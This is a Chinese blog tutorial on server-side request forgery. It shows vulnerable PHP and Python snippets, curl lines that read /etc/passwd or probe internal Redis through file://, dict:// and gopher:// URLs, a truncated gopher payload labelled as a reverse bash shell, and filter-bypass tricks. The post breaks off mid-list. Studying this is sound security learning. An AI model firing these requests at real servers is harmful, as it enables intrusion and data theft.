<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ayan0.top","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":280,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="♿1919810分钟能了解SSRF吗♿ 冲刺♿，冲刺♿，冲♿  SSRF是扫码">
<meta property="og:type" content="article">
<meta property="og:title" content="114514分钟能了解SSRF吗">
<meta property="og:url" content="https://ayan0.top/2025/07/07/114514%E5%88%86%E9%92%9F%E8%83%BD%E4%BA%86%E8%A7%A3SSRF%E5%90%97/">
<meta property="og:site_name" content="Blog of AyaN0">
<meta property="og:description" content="♿1919810分钟能了解SSRF吗♿ 冲刺♿，冲刺♿，冲♿  SSRF是扫码">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250505140956343.png">
<meta property="article:published_time" content="2025-07-07T05:05:59.000Z">
<meta property="article:modified_time" content="2025-07-10T04:45:10.821Z">
<meta property="article:author" content="AyaN0">
<meta property="article:tag" content="-Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250505140956343.png">


<link rel="canonical" href="https://ayan0.top/2025/07/07/114514%E5%88%86%E9%92%9F%E8%83%BD%E4%BA%86%E8%A7%A3SSRF%E5%90%97/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ayan0.top/2025/07/07/114514%E5%88%86%E9%92%9F%E8%83%BD%E4%BA%86%E8%A7%A3SSRF%E5%90%97/","path":"2025/07/07/114514分钟能了解SSRF吗/","title":"114514分钟能了解SSRF吗"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>114514分钟能了解SSRF吗 | Blog of AyaN0</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/lly.jpg" alt="Blog of AyaN0">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Blog of AyaN0</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1919810%E5%88%86%E9%92%9F%E8%83%BD%E4%BA%86%E8%A7%A3ssrf%E5%90%97"><span class="nav-number">1.</span> <span class="nav-text"> ♿1919810分钟能了解SSRF吗♿</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ssrf%E6%98%AF%E6%89%AB%E7%A0%81"><span class="nav-number">1.1.</span> <span class="nav-text"> SSRF是扫码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php"><span class="nav-number">1.2.</span> <span class="nav-text"> PHP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#python"><span class="nav-number">1.3.</span> <span class="nav-text"> Python</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8"><span class="nav-number">1.4.</span> <span class="nav-text"> 利用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#file"><span class="nav-number">1.4.1.</span> <span class="nav-text"> file</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dict"><span class="nav-number">1.4.2.</span> <span class="nav-text"> dict</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#gopher"><span class="nav-number">1.4.3.</span> <span class="nav-text"> gopher</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#https"><span class="nav-number">1.4.4.</span> <span class="nav-text"> http&#x2F;s</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%AC%E5%9C%B0%E5%88%A9%E7%94%A8"><span class="nav-number">1.4.5.</span> <span class="nav-text"> 本地利用:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A3%80%E6%B5%8B%E7%AB%AF%E5%8F%A3%E6%83%85%E5%86%B5"><span class="nav-number">1.4.6.</span> <span class="nav-text"> 检测端口情况</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%AA%8C%E8%AF%81"><span class="nav-number">1.5.</span> <span class="nav-text"> 验证</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8E%92%E9%99%A4%E6%B3%95"><span class="nav-number">1.5.1.</span> <span class="nav-text"> 排除法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dnslog%E7%AD%89%E5%B7%A5%E5%85%B7%E8%BF%9B%E8%A1%8C%E6%B5%8B%E8%AF%95"><span class="nav-number">1.5.2.</span> <span class="nav-text"> dnslog等工具进行测试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%9E%90%E8%AF%B7%E6%B1%82%E7%9A%84%E5%8F%91%E8%B5%B7%E7%AB%AF"><span class="nav-number">1.5.3.</span> <span class="nav-text"> 分析请求的发起端</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%95%99%E6%84%8F%E8%BF%94%E5%9B%9E%E4%BF%A1%E6%81%AF"><span class="nav-number">1.5.4.</span> <span class="nav-text"> 留意返回信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%95%99%E6%84%8F%E5%B8%83%E5%B0%94%E5%9E%8Bssrf"><span class="nav-number">1.5.5.</span> <span class="nav-text"> 留意布尔型SSRF</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#waf"><span class="nav-number">1.6.</span> <span class="nav-text"> WAF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E6%8C%87%E5%90%91xipio"><span class="nav-number">1.6.1.</span> <span class="nav-text"> 任意指向(xip.io)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8-2"><span class="nav-number">1.6.2.</span> <span class="nav-text"> 利用[::]</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8-3"><span class="nav-number">1.6.3.</span> <span class="nav-text"> 利用@</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E7%9F%AD%E9%93%BE%E6%8E%A5"><span class="nav-number">1.6.4.</span> <span class="nav-text"> 利用短链接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9%E7%B1%BB%E5%9E%8B"><span class="nav-number">1.6.5.</span> <span class="nav-text"> 修改类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8enclosed-alphanumerics"><span class="nav-number">1.6.6.</span> <span class="nav-text"> 利用Enclosed alphanumerics</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%8F%A5%E5%8F%B7"><span class="nav-number">1.6.7.</span> <span class="nav-text"> 利用句号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2"><span class="nav-number">1.6.8.</span> <span class="nav-text"> 利用进制转换</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%8D%8F%E8%AE%AE"><span class="nav-number">1.6.9.</span> <span class="nav-text"> 利用协议</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="AyaN0"
      src="/images/lly.jpg">
  <p class="site-author-name" itemprop="name">AyaN0</p>
  <div class="site-description" itemprop="description">不断的前进的人:只有0次摔倒或无数次的爬起</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/kisakiayano" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;kisakiayano" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1594453512@qq.com" title="E-Mail → 1594453512@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ayan0.top/2025/07/07/114514%E5%88%86%E9%92%9F%E8%83%BD%E4%BA%86%E8%A7%A3SSRF%E5%90%97/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/lly.jpg">
      <meta itemprop="name" content="AyaN0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog of AyaN0">
      <meta itemprop="description" content="不断的前进的人:只有0次摔倒或无数次的爬起">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="114514分钟能了解SSRF吗 | Blog of AyaN0">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          114514分钟能了解SSRF吗
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-07-07 13:05:59" itemprop="dateCreated datePublished" datetime="2025-07-07T13:05:59+08:00">2025-07-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-07-10 12:45:10" itemprop="dateModified" datetime="2025-07-10T12:45:10+08:00">2025-07-10</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>5.8k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>11 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="1919810分钟能了解ssrf吗"><a class="markdownIt-Anchor" href="#1919810分钟能了解ssrf吗"></a> ♿1919810分钟能了解SSRF吗♿</h1>
<p>冲刺♿，冲刺♿，冲♿</p>
<h2 id="ssrf是扫码"><a class="markdownIt-Anchor" href="#ssrf是扫码"></a> SSRF是扫码</h2>
<p>SSRF，全称<strong>Server-Side Request Forgery，服务器端请求伪造</strong></p>
<p>关键词是<code>ip</code></p>
<p>通过用户输入包含URL的功能/请求参数包含外部资源应用来触发s</p>
<p>说白了就是通过一些方式偷偷的摸进内网视奸</p>
<p>目前有记载的主流的在PHP</p>
<p>说实话其实只要涉及对内网的文件有读取(从自身发起请求)，过滤又不充分的都会触发这个漏洞的</p>
<h2 id="php"><a class="markdownIt-Anchor" href="#php"></a> PHP</h2>
<pre><code class="highlight php"><span class="title function_ invoke__">file_get_contents</span>()
<span class="title function_ invoke__">fsockopen</span>()
<span class="title function_ invoke__">curl_exec</span>()
<span class="title function_ invoke__">fopen</span>()
<span class="title function_ invoke__">readfile</span>()</code></pre>
<p>先讲第一个</p>
<ul>
<li><code>file_get_contents()</code></li>
</ul>
<pre><code class="highlight php"><span class="meta">&lt;?php</span>
<span class="variable">$url</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];;
<span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$url</span>);
<span class="meta">?&gt;</span></code></pre>
<p>从url这个参数里获取内容，并指定一个文件名进行保存</p>
<p>而<code>file_put_contents</code>是把字符串写入文件当中</p>
<ul>
<li><code>fsockopen()</code></li>
</ul>
<pre><code class="highlight php"><span class="meta">&lt;?php</span> 
<span class="function"><span class="keyword">function</span> <span class="title">GetFile</span>(<span class="params"><span class="variable">$host</span>,<span class="variable">$port</span>,<span class="variable">$link</span></span>) </span>&#123; 
    <span class="variable">$fp</span> = <span class="title function_ invoke__">fsockopen</span>(<span class="variable">$host</span>, <span class="title function_ invoke__">intval</span>(<span class="variable">$port</span>), <span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="number">30</span>); 
    <span class="keyword">if</span> (!<span class="variable">$fp</span>) &#123; 
        <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$errstr</span> (error number <span class="subst">$errno</span>) \n&quot;</span>; 
    &#125; <span class="keyword">else</span> &#123; 
        <span class="variable">$out</span> = <span class="string">&quot;GET <span class="subst">$link</span> HTTP/1.1\r\n&quot;</span>; 
        <span class="variable">$out</span> .= <span class="string">&quot;Host: <span class="subst">$host</span>\r\n&quot;</span>; 
        <span class="variable">$out</span> .= <span class="string">&quot;Connection: Close\r\n\r\n&quot;</span>; 
        <span class="variable">$out</span> .= <span class="string">&quot;\r\n&quot;</span>; 
        <span class="title function_ invoke__">fwrite</span>(<span class="variable">$fp</span>, <span class="variable">$out</span>); 
        <span class="variable">$contents</span>=<span class="string">&#x27;&#x27;</span>; 
        <span class="keyword">while</span> (!<span class="title function_ invoke__">feof</span>(<span class="variable">$fp</span>)) &#123; 
            <span class="variable">$contents</span>.= <span class="title function_ invoke__">fgets</span>(<span class="variable">$fp</span>, <span class="number">1024</span>); 
        &#125; 
        <span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>); 
        <span class="keyword">return</span> <span class="variable">$contents</span>; 
    &#125; 
&#125;
<span class="meta">?&gt;</span></code></pre>
<p><code>fsockopen</code>函数实现对用户指定url数据的获取，该函数使用socket（端口）跟服务器建立tcp连接，传输数据。变量host为主机名，port为端口，errstr表示错误信息将以字符串的信息返回，30为时限</p>
<ul>
<li><code>curl_exec()</code></li>
</ul>
<p>cURL这是另一个非常常见的实现，它通过 PHP获取数据。文件/数据被下载并存储在“curled”文件夹下的磁盘中，并附加了一个随机数和“.txt”文件扩展名。</p>
<pre><code class="highlight php"><span class="meta">&lt;?php</span> 
<span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;url&#x27;</span>])) &#123;
    <span class="variable">$link</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;url&#x27;</span>];
    <span class="variable">$curlobj</span> = <span class="title function_ invoke__">curl_init</span>();
    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$curlobj</span>, CURLOPT_POST, <span class="number">0</span>);
    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$curlobj</span>,CURLOPT_URL,<span class="variable">$link</span>);
    <span class="title function_ invoke__">curl_setopt</span>(<span class="variable">$curlobj</span>, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);
    <span class="variable">$result</span>=<span class="title function_ invoke__">curl_exec</span>(<span class="variable">$curlobj</span>);
    <span class="title function_ invoke__">curl_close</span>(<span class="variable">$curlobj</span>);

    <span class="variable">$filename</span> = <span class="string">&#x27;./curled/&#x27;</span>.<span class="title function_ invoke__">rand</span>().<span class="string">&#x27;.txt&#x27;</span>;
    <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$result</span>); 
    <span class="keyword">echo</span> <span class="variable">$result</span>;
&#125;
<span class="meta">?&gt;</span></code></pre>
<p><code>curl_exec</code>函数用于执行指定的cURL会话</p>
<ul>
<li><code>fopen()</code></li>
<li><code>readfile()</code></li>
</ul>
<blockquote>
<p>[!CAUTION]</p>
</blockquote>
<pre><code class="highlight plaintext">1.一般情况下PHP不会开启fopen的gopher wrapper
2.file_get_contents的gopher协议不能URL编码
3.file_get_contents关于Gopher的302跳转会出现bug，导致利用失败
4.curl/libcurl 7.43 上gopher协议存在bug(%00截断) 经测试7.49 可用
5.curl_exec() //默认不跟踪跳转，
6.file_get_contents() // file_get_contents支持php://input协议</code></pre>
<h2 id="python"><a class="markdownIt-Anchor" href="#python"></a> Python</h2>
<p>对python的SSRF不太熟悉，故这里引用大佬的一些内容</p>
<p>在Python中，常用的函数有urllib(urllib2)和requests库。以urllib(urllib2)为例， urllib并不支持gopher,dict协议，所以按照常理来讲ssrf在python中的危害也应该不大，但是当SSRF遇到CRLF，奇妙的事情就发生了。</p>
<p>urllib曾爆出CVE-2019-9740、CVE-2019-9947两个漏洞，这两个漏洞都是urllib(urllib2)的CRLF漏洞，只是触发点不一样，其影响范围都在urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3之间，目前大部分服务器的python2版本都在2.7.10以下，python3都在3.6.x，这两个CRLF漏洞的影响力就非常可观了。其实之前还有一个CVE-2016-5699，同样的urllib（urllib2）的CRLF问题，但是由于时间比较早，影响范围没有这两个大，这里也不再赘叙</p>
<p>python2代码如下：</p>
<pre><code class="highlight plaintext">import sysimport urllib2host = &quot;127.0.0.1:7777?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123&quot;url = &quot;http://&quot;+ host + &quot;:8080/test/?test=a&quot;try:  info = urllib2.urlopen(url).info()  print(info)except Exception as e:print(e)</code></pre>
<h2 id="利用"><a class="markdownIt-Anchor" href="#利用"></a> 利用</h2>
<p>一般利用需要以下协议</p>
<h3 id="file"><a class="markdownIt-Anchor" href="#file"></a> file</h3>
<p>有回显的情况下可以打，读取任意内容</p>
<h3 id="dict"><a class="markdownIt-Anchor" href="#dict"></a> dict</h3>
<p>泄露安装软件版本信息，查看端口，操作内网redis服务等</p>
<pre><code class="highlight plaintext">http://test.org/ssrf.php?url=dict://127.0.0.1:6379/info  //查看reids相关配置

如果ssrf.php中加上一行屏蔽回显的代码“curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);”，那么这种方式就失效了，和gopher一样，只能利用nc监听端口，反弹传输数据了。</code></pre>
<h3 id="gopher"><a class="markdownIt-Anchor" href="#gopher"></a> gopher</h3>
<p>gopher支持发出GET、POST请求：可以先截获get请求包和post请求包，再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell.</p>
<p>gopher包构造方法</p>
<p><strong>GET包</strong></p>
<pre><code class="highlight plaintext">截取第一行和第二行(全部url编码并且+_)
GET ......
Host ......</code></pre>
<p>实例:</p>
<pre><code class="highlight plaintext">GET /testg.php?name=xxx HTTP/1.1
Host: 10.211.55.2
可以构造为
_%47%45%54%20%2f%74%65%73%74%67%2e%70%68%70%3f%6e%61%6d%65%3d%78%78%78%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%32%31%31%2e%35%35%2e%32%0d%0a

一定要手工补上换行%0d%0a</code></pre>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250505140956343.png" alt="image-20250505140956343"></p>
<p><strong>POST包</strong></p>
<pre><code class="highlight plaintext">截取以下部分
POST ....
Host ....
Content-Type: application/x-www-form-urlencoded
Content-Length: i</code></pre>
<h3 id="https"><a class="markdownIt-Anchor" href="#https"></a> http/s</h3>
<p>探测内网主机存活</p>
<h3 id="本地利用"><a class="markdownIt-Anchor" href="#本地利用"></a> 本地利用:</h3>
<p>（1）使用file协议 file protocol (任意文件读取)</p>
<pre><code class="highlight plaintext">curl -vvv &quot;http://target/ssrf.php?url=file:///etc/passwd&quot;</code></pre>
<p>（2）使用dict协议 dict protocol (获取Redis配置信息)</p>
<pre><code class="highlight plaintext">curl -vvv &quot;http://target/ssrf.php?url=dict://127.0.0.1:6379/info&quot;</code></pre>
<p>（3）使用gopher协议(俗称万能协议) gopher protocol (一键反弹Bash)</p>
<pre><code class="highlight plaintext">curl -vvv &quot;http://target/ssrf.php?url=gopher://127.0.0.1:6379/_*1 %0d %0a $8%0d %0aflushall %0d %0a*3 %0d %0a $3%0d</code></pre>
<h3 id="检测端口情况"><a class="markdownIt-Anchor" href="#检测端口情况"></a> 检测端口情况</h3>
<pre><code class="highlight plaintext">3306： MySQL
443：tcp
8080：TCP服务端默认端口、JBOSS、TOMCAT、Oracle XDB（XML 数据库）
6379：Redis数据库端口</code></pre>
<h2 id="验证"><a class="markdownIt-Anchor" href="#验证"></a> 验证</h2>
<p>一般URL上会出现关键字类似于</p>
<pre><code class="highlight plaintext">Share、wap、url、link、src、source、target、u、3g、display、sourceURL、imageURL、domain</code></pre>
<h3 id="排除法"><a class="markdownIt-Anchor" href="#排除法"></a> 排除法</h3>
<p>浏览器f12查看源代码看是否是在本地进行了请求</p>
<p>比如：该资源地址类型为 <a target="_blank" rel="noopener" href="http://www.xxx.com/a.php?image=URL,URL%E5%8F%82%E6%95%B0%E8%8B%A5%E6%98%AF%E5%85%B6%E4%BB%96%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%9C%B0%E5%9D%80%E5%B0%B1%E5%8F%AF%E8%83%BD%E5%AD%98%E5%9C%A8SSRF%E6%BC%8F%E6%B4%9E">http://www.xxx.com/a.php?image=URL,URL参数若是其他服务器地址就可能存在SSRF漏洞</a></p>
<h3 id="dnslog等工具进行测试"><a class="markdownIt-Anchor" href="#dnslog等工具进行测试"></a> dnslog等工具进行测试</h3>
<p>看是否被访问(可以在盲打后台，用例中将当前准备请求的url和参数编码成base64，这样盲打后台解码后就知道是哪台机器哪个cgi触发的请求)</p>
<h3 id="分析请求的发起端"><a class="markdownIt-Anchor" href="#分析请求的发起端"></a> 分析请求的发起端</h3>
<p>抓包分析发送的请求是不是通过服务器发送的，如果不是客户端发出的请求，则有可能是存在漏洞。接着找存在HTTP服务的内网地址</p>
<ul>
<li>从漏洞平台中的历史漏洞寻找泄漏的存在web应用内网地址</li>
<li>通过二级域名暴力猜解工具模糊猜测内网地址</li>
<li>通过file协议读取内网信息获取相关地址</li>
</ul>
<h3 id="留意返回信息"><a class="markdownIt-Anchor" href="#留意返回信息"></a> 留意返回信息</h3>
<p>直接返回的Banner、title、content等信息</p>
<h3 id="留意布尔型ssrf"><a class="markdownIt-Anchor" href="#留意布尔型ssrf"></a> 留意布尔型SSRF</h3>
<p>通过判断两次不同请求结果的差异来判断是否存在SSRF，类似布尔型sql盲注方法。</p>
<h2 id="waf"><a class="markdownIt-Anchor" href="#waf"></a> WAF</h2>
<h3 id="任意指向xipio"><a class="markdownIt-Anchor" href="#任意指向xipio"></a> 任意指向(<a target="_blank" rel="noopener" href="http://xip.io">xip.io</a>)</h3>
<pre><code class="highlight plaintext">http://127.0.0.1.xip.io/==&gt;http://127.0.0.1/</code></pre>
<h3 id="利用-2"><a class="markdownIt-Anchor" href="#利用-2"></a> 利用[::]</h3>
<pre><code class="highlight plaintext">利用[::]绕过localhost 
http://[::]:80/  &gt;&gt;&gt;  http://127.0.0.1</code></pre>
<h3 id="利用-3"><a class="markdownIt-Anchor" href="#利用-3"></a> 利用@</h3>
<pre><code class="highlight plaintext">http://example.com@127.0.0.1</code></pre>
<h3 id="利用短链接"><a class="markdownIt-Anchor" href="#利用短链接"></a> 利用短链接</h3>
<pre><code class="highlight plaintext">http://dwz.cn/11SMa  &gt;&gt;&gt;  http://127.0.0.1
http://sudo.cc &gt;&gt;&gt;http://127.0.0.1</code></pre>
<h3 id="修改类型"><a class="markdownIt-Anchor" href="#修改类型"></a> 修改类型</h3>
<pre><code class="highlight plaintext">修改&quot;type=file&quot;为&quot;type=url&quot;
比如：
上传图片处修改上传，将图片文件修改为URL，即可能触发SSRF</code></pre>
<h3 id="利用enclosed-alphanumerics"><a class="markdownIt-Anchor" href="#利用enclosed-alphanumerics"></a> 利用Enclosed alphanumerics</h3>
<pre><code class="highlight plaintext">利用Enclosed alphanumerics
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  &gt;&gt;&gt;  example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
